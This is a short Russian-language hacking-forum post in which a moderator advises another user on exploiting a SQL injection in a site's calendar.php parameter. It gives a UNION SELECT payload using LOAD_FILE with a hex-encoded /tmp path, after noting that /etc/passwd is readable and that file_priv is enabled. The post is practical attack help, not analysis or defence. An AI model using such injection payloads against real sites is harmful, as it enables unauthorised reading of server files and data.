27.10.2009, 21:51
|
|
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
С нами:
9154406
Репутация:
2221
|
|
Сообщение от _gr34t
Rubaka, в смысле прав нем? у папки /tmp ведь права 777, т.е. доступна на запись всем.
Или юзеру, от которого выполняется запрос в mysql? Но ведь /etc/passwd читается, значит file_priv=y
Возможно addslashes() - НЕТ.
попробуй
http://site.com/calendar.php?event_id=68199+union+select+1,LOAD_FI LE(0x2f746d702f31),...,67
Возможно файл уже существует, пробуй /tmp/rubaka
Последний раз редактировалось Ctacok; 27.10.2009 в 21:55..
|
|
|